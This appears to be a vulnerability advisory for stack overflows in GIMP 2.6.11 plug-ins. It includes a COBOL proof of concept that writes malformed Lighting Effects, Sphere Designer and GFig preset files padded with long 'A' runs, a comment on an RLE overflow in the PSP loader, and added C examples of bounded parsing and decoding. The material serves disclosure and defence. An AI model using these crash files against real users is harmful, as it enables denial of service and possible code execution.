source: https://www.securityfocus.com/bid/45647/info
GIMP is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate checks on user-supplied input.
Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
GIMP 2.6.11 is vulnerable; other versions may also be affected.
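The proof of concept that follows writes three preset files (Lighting Effects, Sphere Designer, GFig) in which a single text field is padded out to well over a hundred characters, which is enough to overrun a fixed-size buffer in the plug-in that reads it. The C code below is an added example, not GIMP's parser and not the PoC authors' code; it shows the bounded way to read a "Key: value" preset of this shape: the line length is capped, every token is copied with an explicit bound and rejected rather than truncated when it does not fit, and numeric fields are parsed with strtod so a run of letters where a number belongs is an error. The limits MAX_LINE and MAX_TOKEN, the function names and the two sample inputs are assumptions made for the example; the page does not give the real buffer sizes.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Limits assumed for this example; the page does not give the plug-ins' real buffer sizes. */
#define MAX_LINE  256
#define MAX_TOKEN 32

enum preset_status { PRESET_OK = 0, PRESET_LINE_TOO_LONG,
                     PRESET_TOKEN_TOO_LONG, PRESET_BAD_NUMBER };

/* Copy the next whitespace-delimited token at *cursor into out[outsz].
 * Returns 1 on success, 0 if no token remains, -1 if the token would not fit:
 * an over-long field is an error, never a silent truncation or an unbounded copy. */
static int next_token(const char **cursor, char *out, size_t outsz)
{
    const char *p = *cursor;
    size_t n = 0;
    while (*p == ' ' || *p == '\t') p++;
    while (p[n] != '\0' && strchr(" \t\r\n", p[n]) == NULL) n++;
    if (n == 0) return 0;
    if (n >= outsz) return -1;
    memcpy(out, p, n);
    out[n] = '\0';
    *cursor = p + n;
    return 1;
}

/* Parse the three numeric fields that follow `key` (e.g. "Position: 0 -1 1"). */
int parse_vec3_field(const char *line, const char *key, double vec[3])
{
    const char *cur = line + strlen(key);
    for (int i = 0; i < 3; i++) {
        char tok[MAX_TOKEN];
        char *end;
        int r = next_token(&cur, tok, sizeof tok);
        if (r < 0) return PRESET_TOKEN_TOO_LONG;
        if (r == 0) return PRESET_BAD_NUMBER;
        errno = 0;
        vec[i] = strtod(tok, &end);
        if (end == tok || *end != '\0' || errno == ERANGE) return PRESET_BAD_NUMBER;
    }
    return PRESET_OK;
}

/* Walk an in-memory preset line by line and stop at the first over-long line,
 * over-long token, or non-numeric vector field. If bad_line is non-NULL it
 * receives the 1-based number of the offending line (0 when the file is clean). */
int validate_lighting_preset(const char *text, int *bad_line)
{
    static const char *vec_keys[] = { "Position:", "Direction:", "Color:" };
    const char *p = text;
    int lineno = 0;
    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[MAX_LINE];
        lineno++;
        if (len >= MAX_LINE) { if (bad_line) *bad_line = lineno; return PRESET_LINE_TOO_LONG; }
        memcpy(line, p, len);
        line[len] = '\0';
        for (size_t k = 0; k < sizeof vec_keys / sizeof vec_keys[0]; k++) {
            size_t klen = strlen(vec_keys[k]);
            if (strncmp(line, vec_keys[k], klen) == 0) {
                double v[3];
                int rc = parse_vec3_field(line, vec_keys[k], v);
                if (rc != PRESET_OK) { if (bad_line) *bad_line = lineno; return rc; }
            }
        }
        p = nl ? nl + 1 : p + len;
    }
    if (bad_line) *bad_line = 0;
    return PRESET_OK;
}

/* Constructed sample input (not the PoC's exact bytes): a well-formed preset. */
const char *good_preset(void)
{
    return "Number of lights: 1\nType: Point\nPosition: 0 -1 1\n"
           "Direction: -1 -1 1\nColor: 1 1 1\nIntensity: 1\n";
}

/* Constructed sample: the same file, but the Position field carries one
 * 117-character non-numeric token, the shape of the PoC's first file
 * (an "A" followed by four blocks of 29 "A"s). */
const char *overlong_position_preset(void)
{
    static char buf[512];
    size_t n = (size_t)snprintf(buf, sizeof buf, "Number of lights: 1\nType: Point\nPosition: ");
    memset(buf + n, 'A', 117);
    n += 117;
    snprintf(buf + n, sizeof buf - n, " -1 1\nDirection: -1 -1 1\nColor: 1 1 1\nIntensity: 1\n");
    return buf;
}

int main(void)
{
    int bad = 0;
    printf("good preset: status %d\n", validate_lighting_preset(good_preset(), &bad));
    int rc = validate_lighting_preset(overlong_position_preset(), &bad);
    printf("over-long Position token: status %d at line %d\n", rc, bad);
    return 0;
}
```

The same validator can be run over a preset before the plug-in is allowed to load it, which is also a cheap way to flag files of the shape the PoC produces: any line over MAX_LINE or any vector field whose token does not fit MAX_TOKEN is reported with its line number.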
000010 IDENTIFICATION DIVISION.
000020 PROGRAM-ID. GIMP-OVERFLOWS-POC-IN-COBOL.
000030 AUTHOR. NON-CUSTOMERS CREW.
000040*SHOE SIZE DECLARATION. 43.
000050
000060 ENVIRONMENT DIVISION.
000070 INPUT-OUTPUT SECTION.
000080 FILE-CONTROL.
000090 SELECT FILE01 ASSIGN TO "GIMP01.LIGHTINGPRESETS"
000100 ORGANIZATION IS LINE SEQUENTIAL.
000110 SELECT FILE02 ASSIGN TO "GIMP02.SPHEREDESIGNER"
000120 ORGANIZATION IS LINE SEQUENTIAL.
000130 SELECT FILE03 ASSIGN TO "GIMP03.GFIG"
000140 ORGANIZATION IS LINE SEQUENTIAL.
000150* FOR THE 4TH OVERFLOW, SEE BELOW.
000160
000170 DATA DIVISION.
000180 FILE SECTION.
000190 FD FILE01.
000200 01 PRINTLINE PIC X(800).
000210 FD FILE02.
000220 01 QRINTLINE PIC X(800).
000230 FD FILE03.
000240 01 RRINTLINE PIC X(800).
000250
000260 WORKING-STORAGE SECTION.
000270 01 TEXT-OUT1 PIC X(29) VALUE 'Number of lights: 1'.
000280 01 TEXT-OUT2 PIC X(29) VALUE 'Type: Point'.
000290 01 TEXT-OUT3 PIC X(29) VALUE 'Position: A'.
000300 01 TEXT-OUT4 PIC X(29) VALUE 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
000310 01 TEXT-OUT5 PIC X(29) VALUE ' -1 1'.
000320 01 TEXT-OUT6 PIC X(29) VALUE 'Direction: -1 -1 1'.
000330 01 TEXT-OUT7 PIC X(29) VALUE 'Color: 1 1 1'.
000340 01 TEXT-OUT8 PIC X(29) VALUE 'Intensity: 1'.
000350 01 TEXU-OUT1 PIC X(29) VALUE '0 0 A'.
000360 01 TEXU-OUT2 PIC X(29) VALUE 'A 1 1 1 0 0 0 1 1 0 1 1 1 1 1'.
000370 01 TEXU-OUT3 PIC X(29) VALUE '0 0 0 0 0 0 0'.
000380 01 TEXV-OUT1 PIC X(29) VALUE 'GFIG Version 0.2'.
000390 01 TEXV-OUT2 PIC X(29) VALUE 'Name: First\040Gfig'.
000400 01 TEXV-OUT3 PIC X(29) VALUE 'Version: 0.000000'.
000410 01 TEXV-OUT4 PIC X(29) VALUE 'ObjCount: 0'.
000420 01 TEXV-OUT5 PIC X(29) VALUE '<OPTIONS>'.
000430 01 TEXV-OUT6 PIC X(29) VALUE 'GridSpacing: 30'.
000440 01 TEXV-OUT7 PIC X(29) VALUE 'GridType: RECT_GRID'.
000450 01 TEXV-OUT8 PIC X(29) VALUE 'DrawGrid: FALSE'.
000460 01 TEXV-OUT9 PIC X(29) VALUE 'Snap2Grid: FALSE'.
000470 01 TEXV-OUTA PIC X(29) VALUE 'LockOnGrid: FALSE'.
000480 01 TEXV-OUTB PIC X(29) VALUE 'ShowControl: TRUE'.
000490 01 TEXV-OUTC PIC X(29) VALUE '</OPTIONS>'.
000500 01 TEXV-OUTD PIC X(29) VALUE '<Style Base>'.
000510 01 TEXV-OUTE PIC X(29) VALUE 'BrushName: Circle (11)'.
000520 01 TEXV-OUTF PIC X(29) VALUE 'PaintType: 1'.
000530 01 TEXV-OUTG PIC X(29) VALUE 'FillType: 0'.
000540 01 TEXV-OUTH PIC X(29) VALUE 'FillOpacity: 100'.
000550 01 TEXV-OUTI PIC X(29) VALUE 'Pattern: Pine'.
000560 01 TEXV-OUTJ PIC X(29) VALUE 'Gradient: FG to BG (RGB)'.
000570 01 TEXV-OUTK PIC X(29) VALUE 'Foreground: A'.
000580 01 TEXV-OUTL PIC X(29) VALUE 'AA 0 0 1'.
000590 01 TEXV-OUTM PIC X(29) VALUE 'Background: 1 1 1 1'.
000600 01 TEXV-OUTN PIC X(29) VALUE '</Style>'.
000610
000620 PROCEDURE DIVISION.
000630 MAIN-PARAGRAPH.
000640* 1. FILTERS > LIGHT AND SHADOW > LIGHTING EFFECTS > LIGHT > OPEN
000650 OPEN OUTPUT FILE01.
000660 WRITE PRINTLINE FROM TEXT-OUT1.
000670 WRITE PRINTLINE FROM TEXT-OUT2.
000680 WRITE PRINTLINE FROM TEXT-OUT3 AFTER ADVANCING 0 LINES.
000690 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000700 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000710 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000720 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000730 WRITE PRINTLINE FROM TEXT-OUT5.
000740 WRITE PRINTLINE FROM TEXT-OUT6.
000750 WRITE PRINTLINE FROM TEXT-OUT7.
000760 WRITE PRINTLINE FROM TEXT-OUT8.
000770 CLOSE FILE01.
000780
000790* 2. FILTERS > RENDER > SPHERE DESIGNER > OPEN
000800 OPEN OUTPUT FILE02.
000810 WRITE QRINTLINE FROM TEXU-OUT1 AFTER ADVANCING 0 LINES.
000820 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000830 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000840 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000850 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000860 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000870 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000880 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000890 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000900 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000910 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000920 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000930 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000940 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000950 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000960 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000970 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000980 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
000990 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001000 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001010 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001020 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001030 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001040 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001050 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001060 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001070 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001080 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001090 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001100 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001110 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001120 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001130 WRITE QRINTLINE FROM TEXU-OUT2 AFTER ADVANCING 0 LINES.
001140 WRITE QRINTLINE FROM TEXU-OUT3.
001150 CLOSE FILE02.
001160
001170* 3. FILTERS > RENDER > GFIG > FILE > OPEN
001180 OPEN OUTPUT FILE03.
001190 WRITE RRINTLINE FROM TEXV-OUT1.
001200 WRITE RRINTLINE FROM TEXV-OUT2.
001210 WRITE RRINTLINE FROM TEXV-OUT3.
001220 WRITE RRINTLINE FROM TEXV-OUT4.
001230 WRITE RRINTLINE FROM TEXV-OUT5.
001240 WRITE RRINTLINE FROM TEXV-OUT6.
001250 WRITE RRINTLINE FROM TEXV-OUT7.
001260 WRITE RRINTLINE FROM TEXV-OUT8.
001270 WRITE RRINTLINE FROM TEXV-OUT9.
001280 WRITE RRINTLINE FROM TEXV-OUTA.
001290 WRITE RRINTLINE FROM TEXV-OUTB.
001300 WRITE RRINTLINE FROM TEXV-OUTC.
001310 WRITE RRINTLINE FROM TEXV-OUTD.
001320 WRITE RRINTLINE FROM TEXV-OUTE.
001330 WRITE RRINTLINE FROM TEXV-OUTF.
001340 WRITE RRINTLINE FROM TEXV-OUTG.
001350 WRITE RRINTLINE FROM TEXV-OUTH.
001360 WRITE RRINTLINE FROM TEXV-OUTI.
001370 WRITE RRINTLINE FROM TEXV-OUTJ.
001380 WRITE RRINTLINE FROM TEXV-OUTK AFTER ADVANCING 0 LINES.
001390 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001400 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001410 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
001420 WRITE RRINTLINE FROM TEXV-OUTL.
001430 WRITE RRINTLINE FROM TEXV-OUTM.
001440 WRITE RRINTLINE FROM TEXV-OUTN.
001450 CLOSE FILE03.
001460
001470* 4. THE FUNCTION "read_channel_data()" IN plug-ins/common/file-psp.c HAS AN
001480* OVERFLOW WHEN HANDLING PSP_COMP_RLE TYPE FILES. A MALICIOUS FILE THAT
001490* STARTS A LONG RUNCOUNT AT THE END OF AN IMAGE WILL WRITE OUTSIDE OF
001500* ALLOCATED MEMORY. WE DON'T HAVE A POC FOR THIS BUG.
001510
001520* HAPPY NEW YEAR!!! http://rock-madrid.com/
001530
001540 STOP RUN.
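The fourth bug in the comment above, for which the authors have no PoC, is the classic run-length-decoder failure: the run count read from the file is trusted, so a run that begins near the end of the image and claims more pixels than remain is written past the end of the allocated buffer. The C decoder below is an added example, not the code in plug-ins/common/file-psp.c; the control-byte layout it uses (c < 128: c literal bytes follow; c >= 128: repeat the next byte c - 128 times) is an assumption chosen for illustration, and the three sample streams are constructed for the example. The point is the two bounds checks in the loop: remaining input before every read, remaining output before every write.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum rle_status { RLE_OK = 0, RLE_OUTPUT_OVERRUN, RLE_INPUT_TRUNCATED };

/* Decode in[inlen] into out[outlen] using an assumed PackBits-style layout:
 * control byte c < 128 means "c literal bytes follow", c >= 128 means
 * "repeat the next byte c - 128 times". Every run is checked against the
 * space left in out (and the bytes left in in) before anything is written,
 * so a run that starts near the end of the image and claims more pixels
 * than remain is reported instead of spilling past the buffer. */
int rle_decode_checked(const uint8_t *in, size_t inlen,
                       uint8_t *out, size_t outlen, size_t *consumed)
{
    size_t ip = 0, op = 0;
    while (op < outlen) {
        if (ip >= inlen) return RLE_INPUT_TRUNCATED;
        uint8_t c = in[ip++];
        if (c >= 128) {                        /* repeat run */
            size_t run = (size_t)c - 128;
            if (ip >= inlen) return RLE_INPUT_TRUNCATED;
            uint8_t v = in[ip++];
            if (run > outlen - op) return RLE_OUTPUT_OVERRUN;
            memset(out + op, v, run);
            op += run;
        } else {                               /* literal run */
            size_t run = c;
            if (run > inlen - ip) return RLE_INPUT_TRUNCATED;
            if (run > outlen - op) return RLE_OUTPUT_OVERRUN;
            memcpy(out + op, in + ip, run);
            ip += run;
            op += run;
        }
    }
    if (consumed) *consumed = ip;
    return RLE_OK;
}

/* Constructed sample: a 4-pixel channel as a 3-byte literal run followed by
 * a 1-pixel repeat run. Returns RLE_OK only if decoding succeeded, the whole
 * stream was consumed and the pixels are exactly 10 20 30 40. */
int demo_well_formed(void)
{
    static const uint8_t stream[] = { 0x03, 0x10, 0x20, 0x30, 0x81, 0x40 };
    static const uint8_t want[4]  = { 0x10, 0x20, 0x30, 0x40 };
    uint8_t out[4] = { 0 };
    size_t used = 0;
    int rc = rle_decode_checked(stream, sizeof stream, out, sizeof out, &used);
    if (rc != RLE_OK) return rc;
    return (used == sizeof stream && memcmp(out, want, sizeof want) == 0) ? RLE_OK : -1;
}

/* Constructed hostile sample: two literal pixels, then a 127-pixel repeat
 * run declared when only two output pixels remain. An unchecked version of
 * the loop would write 125 bytes past the end of out. */
int demo_overlong_run(void)
{
    static const uint8_t stream[] = { 0x02, 0xAA, 0xBB, 0xFF, 0xEE };
    uint8_t out[4] = { 0 };
    return rle_decode_checked(stream, sizeof stream, out, sizeof out, NULL);
}

/* Constructed truncated sample: the stream ends inside a literal run, so an
 * unchecked decoder would read past the end of in instead. */
int demo_truncated(void)
{
    static const uint8_t stream[] = { 0x04, 0x01, 0x02 };
    uint8_t out[4] = { 0 };
    return rle_decode_checked(stream, sizeof stream, out, sizeof out, NULL);
}

int main(void)
{
    printf("well-formed: %d  over-long run: %d  truncated: %d\n",
           demo_well_formed(), demo_overlong_run(), demo_truncated());
    return 0;
}
```

Because the checks compare the run length against `outlen - op` and `inlen - ip` (never `op + run` against `outlen`), they cannot themselves overflow on a large count, and a stream whose runs end exactly on the last pixel still decodes cleanly.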